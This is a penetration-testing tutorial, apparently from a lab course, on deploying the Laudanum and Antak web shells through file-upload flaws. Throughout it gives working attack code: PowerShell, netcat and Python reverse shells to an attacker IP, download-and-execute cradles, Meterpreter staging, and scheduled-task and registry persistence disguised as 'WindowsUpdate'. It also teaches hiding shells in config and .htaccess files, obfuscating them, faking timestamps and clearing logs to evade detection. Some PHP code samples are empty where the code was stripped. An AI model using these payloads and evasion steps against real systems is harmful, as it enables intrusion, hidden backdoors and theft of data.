# Web Shells ## Overview Web shells are server-side scripts that provide remote access to web servers through web browsers. They serve as a critical component in web application penetration testing, allowing attackers to execute commands, upload files, and maintain persistence on compromised web servers. ### Why Web Shells Matter **Strategic Advantages:** * **Browser-based access**: No special client software required * **Firewall evasion**: Traffic appears as normal HTTP/HTTPS * **Persistent access**: Remains accessible through web interface * **Platform agnostic**: Works across different operating systems * **Stealth operations**: Blends with legitimate web traffic **Common Use Cases:** * **Initial access**: Gain foothold through file upload vulnerabilities * **Persistence**: Maintain access after initial compromise * **Lateral movement**: Pivot to other systems from web server * **Data exfiltration**: Download sensitive files through web interface * **Command execution**: Run system commands remotely ## Introduction to Laudanum ### What is Laudanum? Laudanum is a comprehensive repository of ready-made web shell files designed for penetration testing and security assessments. It provides a collection of injectable files that can be used to: * **Receive reverse shell connections** * **Execute commands directly from browser** * **Upload and download files** * **Enumerate system information** * **Establish persistence on web servers** ### Supported Technologies Laudanum includes web shells for multiple web application languages: | Language | Extension | Use Case | | -------- | --------- | ------------------------------------ | | **ASP** | `.asp` | Classic ASP applications (IIS) | | **ASPX** | `.aspx` | ASP.NET applications (IIS) | | **JSP** | `.jsp` | Java Server Pages (Tomcat, WebLogic) | | **PHP** | `.php` | PHP applications (Apache, Nginx) | | **CFML** | `.cfm` | ColdFusion applications | | **Perl** | `.pl` | Perl CGI scripts | ### Installation and Availability **Default Distributions:** * **Kali Linux**: Pre-installed in `/usr/share/laudanum` * **Parrot OS**: Built-in by default * **Other Distributions**: Manual installation required **Manual Installation:** ```bash # Clone from GitHub git clone https://github.com/laudanum-shells/laudanum.git # Or download specific release wget https://github.com/laudanum-shells/laudanum/archive/master.zip ``` ## Working with Laudanum ### File Locations **Default Path Structure:** ``` /usr/share/laudanum/ ├── asp/ │ ├── shell.asp │ ├── cmd.asp │ └── upload.asp ├── aspx/ │ ├── shell.aspx │ ├── cmd.aspx │ └── upload.aspx ├── jsp/ │ ├── shell.jsp │ ├── cmd.jsp │ └── upload.jsp ├── php/ │ ├── shell.php │ ├── cmd.php │ └── upload.php └── cfm/ └── shell.cfm ``` ### Preparation and Customization #### Essential Modifications Before deploying Laudanum shells, several modifications are typically required: 1. **IP Address Configuration**: Set attacking host IP for reverse connections 2. **Remove Signatures**: Delete ASCII art and obvious comments 3. **Obfuscation**: Modify variable names and structure 4. **Authentication**: Add password protection if needed #### Basic Configuration Steps **Step 1: Copy for Modification** ```bash cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx ``` **Step 2: Edit Configuration** ```bash nano /home/tester/demo.aspx # or vim /home/tester/demo.aspx ``` **Step 3: Modify Allowed IPs** ```csharp // Example from ASPX shell string[] allowedIps = {"10.10.14.12", "127.0.0.1"}; ``` ### Security Considerations **Operational Security:** * **Remove identifying markers**: ASCII art, author comments, default variables * **Customize appearance**: Change interface styling and text * **Implement authentication**: Add password or session-based protection * **Limit functionality**: Remove unnecessary features to reduce detection risk **Detection Avoidance:** * **Rename files**: Use inconspicuous filenames * **Modify signatures**: Change known strings and patterns * **Use legitimate directories**: Place in expected locations * **Timestamp manipulation**: Match file creation times ## Practical Web Shell Deployment ### Target Environment Setup For demonstration purposes, we'll work with a web application that has file upload functionality. **Prerequisites:** * Target web application with upload capability * Appropriate file type acceptance (ASP, ASPX, PHP, etc.) * Web server write permissions * Network connectivity for testing **Environment Configuration:** ```bash # Add to /etc/hosts for lab environment echo " status.inlanefreight.local" >> /etc/hosts ``` ### Step-by-Step Deployment #### Step 1: Shell Preparation **Copy Laudanum Shell:** ```bash cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx ``` **Modify Configuration:** ```csharp // Line 59 - Add your attacking IP string[] allowedIps = {"10.10.14.12", "127.0.0.1"}; ``` **Recommended Modifications:** ```csharp // Original (REMOVE) /* Laudanum Project Copyright (C) 2006-2016 Kevin Johnson and the Laudanum team http://laudanum.inguardians.com/ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. */ // Remove ASCII art and obvious signatures // Change variable names for obfuscation // Modify interface styling ``` #### Step 2: File Upload Process **Locate Upload Functionality:** * Look for file upload forms on target application * Identify upload directories and naming conventions * Test file type restrictions and filtering **Upload the Shell:** 1. Navigate to upload functionality 2. Select modified web shell file 3. Submit upload request 4. Note success message and file location **Example Upload Result:** ``` File uploaded successfully to: \\files\demo.aspx ``` #### Step 3: Shell Access **Navigate to Uploaded Shell:** ``` # Original path from upload response status.inlanefreight.local\\files\demo.aspx # Browser automatically converts to status.inlanefreight.local//files/demo.aspx ``` **Access Web Shell Interface:** * Open browser and navigate to shell location * Verify shell loads correctly * Test command execution functionality ### Command Execution Examples #### Basic System Information **Windows Commands:** ```cmd systeminfo whoami hostname ipconfig /all tasklist net user ``` **Linux Commands:** ```bash uname -a whoami hostname ifconfig ps aux cat /etc/passwd ``` #### File System Operations **Directory Listing:** ```cmd # Windows dir C:\ dir C:\Users\ # Linux ls -la / ls -la /home/ ``` **File Operations:** ```cmd # Windows type C:\Windows\System32\drivers\etc\hosts copy file.txt C:\temp\ # Linux cat /etc/hosts cp file.txt /tmp/ ``` #### Network Enumeration **Active Connections:** ```cmd # Windows netstat -an arp -a route print # Linux netstat -tulpn arp -a route -n ``` ## Advanced Web Shell Techniques ### Shell Upgrade Strategies #### From Web Shell to Reverse Shell **PowerShell Reverse Shell:** ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.12',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` **Netcat Reverse Shell (Linux):** ```bash nc -e /bin/bash 10.10.14.12 4444 ``` **Python Reverse Shell:** ```bash python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.12',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);" ``` #### File Upload and Download **Upload Files via Web Shell:** * Use built-in upload functionality * Transfer tools and payloads * Upload privilege escalation exploits **Download Sensitive Files:** ```cmd # Windows type C:\Users\Administrator\Desktop\flag.txt copy "C:\Program Files\App\config.xml" C:\inetpub\wwwroot\files\ # Linux cat /etc/shadow cp /etc/passwd /var/www/html/ ``` ### Web Shell Customization #### Custom PHP Web Shell **Minimal PHP Shell:** ```php "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; } ?>
``` **Advanced PHP Shell with Features:** ```php '; exit; } $_SESSION['authenticated'] = true; if(isset($_REQUEST['cmd'])){ echo "
";
    system($_REQUEST['cmd']);
    echo "
"; } ?>
``` #### Custom ASPX Web Shell **Basic ASPX Command Shell:** ```csharp <%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %>
``` ### Persistence Techniques #### Hidden Web Shells **Steganographic Embedding:** ```php ``` **Configuration File Injection:** ```php // Within existing config file $config = array( 'database' => 'localhost', 'username' => 'dbuser' ); // Hidden shell if($_GET['maint']) { system($_GET['cmd']); } ``` #### .htaccess Shells **Apache .htaccess Shell:** ```apache AddType application/x-httpd-php .htaccess # ``` ## Detection and Evasion ### Common Detection Methods **Signature-Based Detection:** * Known web shell signatures in files * Suspicious function calls (system, exec, eval) * Common web shell strings and patterns * File upload monitoring **Behavioral Detection:** * Unusual command execution patterns * Abnormal file access behaviors * Suspicious network connections * Process creation monitoring **Log Analysis:** * Web server access logs * System command execution logs * File modification timestamps * Network connection logs ### Evasion Techniques #### Code Obfuscation **PHP Obfuscation:** ```php // Or using base64 ``` **Variable Function Calls:** ```php ``` #### Traffic Obfuscation **Encrypted Communication:** ```php ``` **Covert Channels:** ```php ``` #### File System Evasion **Timestamp Manipulation:** ```bash # Match timestamps to legitimate files touch -r /var/www/html/index.php /var/www/html/shell.php ``` **Hidden Directories:** ```bash # Use hidden directories mkdir /var/www/html/.config cp shell.php /var/www/html/.config/update.php ``` ## Best Practices and Operational Security ### Deployment Guidelines 1. **Reconnaissance First** * Identify web server technology * Determine supported file types * Map upload functionality * Test file restrictions 2. **Shell Customization** * Remove identifying signatures * Implement authentication * Customize appearance * Limit functionality as needed 3. **Access Management** * Use HTTPS when possible * Implement session management * Monitor access attempts * Plan for emergency removal ### Security Considerations 1. **Authorization Scope** * Only deploy on authorized targets * Follow engagement rules * Document shell locations * Remove after testing completion 2. **Operational Security** * Use encrypted connections * Avoid suspicious commands * Monitor detection systems * Maintain access logs 3. **Cleanup Procedures** * Remove shells after use * Clear access logs if possible * Document artifacts created * Verify complete removal ## Troubleshooting Common Issues ### Upload Problems **File Type Restrictions:** ```bash # Try different extensions shell.php -> shell.php.txt -> shell.txt shell.aspx -> shell.txt -> shell.asp ``` **Size Limitations:** ```bash # Create minimal shells ``` **Content Filtering:** ```bash # Obfuscate suspicious strings str_replace('system', 'sys'.'tem', $func); ``` ### Execution Issues **Permission Problems:** ```bash # Check file permissions ls -la shell.php # Set executable permissions chmod +x shell.php ``` **Path Issues:** ```bash # Use absolute paths /bin/ls instead of ls C:\Windows\System32\cmd.exe instead of cmd ``` **Environment Variables:** ```bash # Set PATH if needed export PATH=/usr/local/bin:/usr/bin:/bin ``` ## Legal and Ethical Considerations ### Authorized Testing Only **Requirements:** * Written authorization for target systems * Clear scope definition * Agreed-upon testing methods * Incident response procedures **Documentation:** * Record all shell deployments * Document access times and activities * Maintain evidence chain * Prepare removal procedures ### Responsible Disclosure **Best Practices:** * Remove shells immediately after testing * Report vulnerabilities to stakeholders * Provide remediation guidance * Follow coordinated disclosure timelines ## Antak Webshell ### Introduction to ASPX #### What is ASPX? **Active Server Page Extended (ASPX)** is a file type/extension written for Microsoft's ASP.NET Framework. Key characteristics: * **Server-side technology**: Runs on web servers with ASP.NET Framework * **Dynamic content generation**: Web form pages generated for user input * **HTML conversion**: Server-side information converted to HTML * **Windows integration**: Native integration with Windows operating systems #### How ASPX Works **Processing Flow:** 1. **User request**: Browser requests ASPX page 2. **Server processing**: ASP.NET Framework processes server-side code 3. **HTML generation**: Dynamic content converted to HTML 4. **Client response**: HTML sent to user's browser **Security Implications:** * **Code execution**: Can execute server-side commands * **System interaction**: Direct access to underlying Windows OS * **Framework integration**: Leverages .NET Framework capabilities ### Antak Webshell Overview #### What is Antak? Antak is a sophisticated web shell built in ASP.NET and included within the **Nishang project**. It provides: * **PowerShell integration**: Native PowerShell command execution * **Advanced UI**: PowerShell-themed interface * **Memory execution**: Script execution in memory * **Command encoding**: Built-in command obfuscation #### Nishang Project Context **Nishang** is an Offensive PowerShell toolset that provides: * **Comprehensive toolkit**: Options for entire pentest lifecycle * **PowerShell focus**: Windows-centric attack tools * **Multiple modules**: Various attack and post-exploitation tools * **Active development**: Regularly updated and maintained ### Antak Features and Capabilities #### Core Functionality **PowerShell Console Simulation:** * **Native PowerShell**: Full PowerShell command support * **Process isolation**: Each command executes as new process * **Interactive interface**: Console-like user experience * **Command history**: Previous commands accessible **Advanced Features:** * **File operations**: Upload and download capabilities * **Script execution**: Memory-based script execution * **Command encoding**: Automatic command obfuscation * **SQL integration**: Database query capabilities * **Configuration parsing**: web.config file analysis #### Technical Advantages **PowerShell Integration:** * **Native Windows**: Leverages built-in Windows capabilities * **Administrative tasks**: Full administrative command access * **.NET Framework**: Complete framework functionality * **Module support**: PowerShell module loading **Security Features:** * **Authentication**: Built-in user/password protection * **Access control**: Restricted access to authorized users * **Session management**: Secure session handling ### Working with Antak #### File Location and Setup **Default Location:** ```bash /usr/share/nishang/Antak-WebShell/ ├── antak.aspx # Main web shell file └── Readme.md # Documentation ``` **File Listing:** ```bash ls /usr/share/nishang/Antak-WebShell antak.aspx Readme.md ``` #### Preparation and Customization **Step 1: Copy for Modification** ```bash cp /usr/share/nishang/Antak-WebShell/antak.aspx /home/administrator/Upload.aspx ``` **Step 2: Configure Authentication** ```csharp // Line 14 - Modify credentials if (Request.Form["userpassword"] == "htb-student" && Request.Form["password"] == "htb-student") { // Original example if (Request.Form["userpassword"] == "Disclaimer" && Request.Form["password"] == "ForLegitUseOnly") } ``` **Step 3: Security Hardening** ```csharp // Remove identifying information /* Antak Webshell Author: nikhil_mitt http://www.labofapenetrationtester.com */ // Remove ASCII art and obvious signatures // Change variable names for obfuscation // Modify interface styling and text ``` ### Practical Antak Deployment #### Environment Setup **Prerequisites:** * Windows server with ASP.NET Framework * IIS web server running * File upload capability on target application * Network connectivity for testing **Lab Configuration:** ```bash # Add to /etc/hosts echo " status.inlanefreight.local" >> /etc/hosts ``` #### Deployment Process **Step 1: Upload Modified Shell** 1. Navigate to target application upload functionality 2. Select modified `Upload.aspx` file 3. Submit upload request 4. Note file location (typically `\\files\` directory) **Step 2: Access Web Shell** ``` # Navigate to uploaded shell status.inlanefreight.local/files/upload.aspx ``` **Step 3: Authentication** * Enter configured username and password * Gain access to Antak interface * Verify PowerShell functionality #### Initial Shell Access **Login Interface:** ``` Username: htb-student Password: htb-student [Login] ``` **Welcome Message:** ``` Welcome to Antak - A Webshell which utilizes PowerShell. Use help for more details. Use clear to clear the screen. ``` ### Antak Interface and Commands #### User Interface Elements **Command Execution:** * **Submit**: Execute entered commands * **Browse**: File system navigation * **Upload the File**: File upload functionality * **Encode and Execute**: Obfuscated command execution * **Download**: File download capabilities * **Parse web.config**: Configuration file analysis * **Execute SQL Query**: Database interaction #### Basic PowerShell Commands **System Information:** ```powershell # Get system information Get-ComputerInfo systeminfo # Current user context whoami [System.Security.Principal.WindowsIdentity]::GetCurrent().Name # PowerShell version $PSVersionTable ``` **File System Operations:** ```powershell # Directory listing Get-ChildItem C:\ ls C:\Users\ # File operations Get-Content C:\Windows\System32\drivers\etc\hosts Copy-Item file.txt C:\temp\ # Directory navigation Set-Location C:\inetpub\wwwroot cd C:\temp ``` **Process Management:** ```powershell # List processes Get-Process tasklist # Service management Get-Service net start net stop servicename ``` #### Advanced Features **File Upload/Download:** ```powershell # Upload files via interface # Use "Browse" and "Upload the File" buttons # Download files # Use "Download" button with file path ``` **Script Execution:** ```powershell # Execute scripts in memory IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/script.ps1') # Encoded execution # Use "Encode and Execute" for obfuscation ``` **SQL Query Execution:** ```sql -- Database interaction SELECT * FROM users; SELECT name FROM sys.databases; ``` ### Advanced Antak Techniques #### Upgrading to Full Shell **PowerShell Reverse Shell:** ```powershell # Execute through Antak interface $client = New-Object System.Net.Sockets.TCPClient('10.10.14.12',4444) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) $sendback = (iex $data 2>&1 | Out-String ) $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ' $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close() ``` **Meterpreter Integration:** ```powershell # Download and execute Meterpreter payload IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/payload.ps1') ``` #### Persistence Through Antak **Scheduled Tasks:** ```powershell # Create scheduled task for persistence schtasks /create /tn "WindowsUpdate" /tr "powershell.exe -ep bypass -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\")'" /sc daily /st 09:00 ``` **Registry Persistence:** ```powershell # Add registry run key New-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "WindowsUpdate" -Value "powershell.exe -ep bypass -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\")'" ``` ### Antak vs. Laudanum Comparison | Feature | Antak | Laudanum | | ------------------ | ------------------------ | ------------------------ | | **Technology** | ASP.NET/PowerShell | Multiple (ASP, PHP, JSP) | | **Interface** | PowerShell-themed UI | Basic command interface | | **Authentication** | Built-in user/password | IP-based restrictions | | **Features** | Advanced (SQL, encoding) | Basic command execution | | **Platform** | Windows/.NET focused | Cross-platform | | **Learning Curve** | Moderate | Easy | | **Obfuscation** | Built-in encoding | Manual modification | ### Security and Operational Considerations #### Detection Signatures **Common Signatures:** ```csharp // Remove these identifying strings "Antak" "nikhil_mitt" "labofapenetrationtester" "Nishang" ``` **Variable Obfuscation:** ```csharp // Original string userpassword = Request.Form["userpassword"]; // Obfuscated string up = Request.Form["user"]; string pwd = Request.Form["pass"]; ``` #### Evasion Techniques **Code Modification:** ```csharp // Change function names void ExecuteCommand() -> void ProcessRequest() void DisplayResult() -> void ShowOutput() // Modify HTML structure Antak -> Admin Panel ``` **Traffic Obfuscation:** ```powershell # Use encoded commands through "Encode and Execute" # Implement custom encryption for sensitive commands # Use legitimate PowerShell modules when possible ``` ### Learning Resources #### IPPSEC Video Resources **Recommended Learning:** * **IPPSEC.rocks**: Search engine for penetration testing concepts * **Keyword search**: Search for "aspx" for related demonstrations * **Video timestamps**: Direct links to relevant sections * **Practical examples**: Real-world ASPX shell usage **Specific Recommendations:** * **Cereal walkthrough**: ASPX shell demonstration (1:17:00 - 1:20:00) * **File upload techniques**: Various boxes showing upload methods * **ASPX enumeration**: Gobuster and directory discovery #### Hands-on Practice **Lab Scenarios:** 1. **File upload exploitation**: Practice with various upload filters 2. **ASPX shell customization**: Modify and deploy custom shells 3. **PowerShell integration**: Leverage advanced PowerShell features 4. **Persistence establishment**: Use Antak for persistent access ### Troubleshooting Antak #### Common Issues **Authentication Problems:** ```csharp // Verify credential configuration if (Request.Form["userpassword"] == "correctuser" && Request.Form["password"] == "correctpass") // Check for typos in variable names // Ensure proper string matching ``` **PowerShell Execution Issues:** ```powershell # Check PowerShell execution policy Get-ExecutionPolicy # Verify .NET Framework version [System.Environment]::Version # Test basic PowerShell functionality $PSVersionTable ``` **File Upload Problems:** ``` # Verify file extension acceptance .aspx -> .txt -> .asp # Check file size limitations # Verify upload directory permissions ``` #### Performance Optimization **Memory Management:** ```powershell # Clear variables after use Remove-Variable -Name * -ErrorAction SilentlyContinue # Garbage collection [System.GC]::Collect() ``` **Connection Stability:** ```csharp // Implement connection timeouts // Add error handling for network issues // Use connection pooling for database operations ``` ## Conclusion Web shells are powerful tools for maintaining access to web servers and executing remote commands through web interfaces. Both Laudanum and Antak provide comprehensive solutions for different scenarios: **Laudanum** offers: * **Multi-platform support**: ASP, ASPX, PHP, JSP, and more * **Simple deployment**: Ready-to-use files with minimal modification * **Basic functionality**: Command execution and file operations * **Wide compatibility**: Works across different web technologies **Antak** provides: * **PowerShell integration**: Native Windows PowerShell capabilities * **Advanced features**: Encoding, SQL queries, file operations * **User-friendly interface**: PowerShell-themed web interface * **Built-in security**: Authentication and session management **Key Takeaways:** * **Multiple technologies**: Support for various web platforms * **Customization required**: Modify signatures and add authentication * **Stealth operations**: Blend with legitimate web traffic * **Upgrade paths**: Transition to more advanced shell types * **Detection awareness**: Understand and evade security controls * **Responsible use**: Deploy only on authorized targets Success with web shells requires understanding target environments, proper customization, and careful operational security. Regular practice with different web technologies and deployment scenarios will improve proficiency and effectiveness in real-world penetration testing engagements. Both Laudanum and Antak serve as excellent starting points for developing advanced web shell capabilities.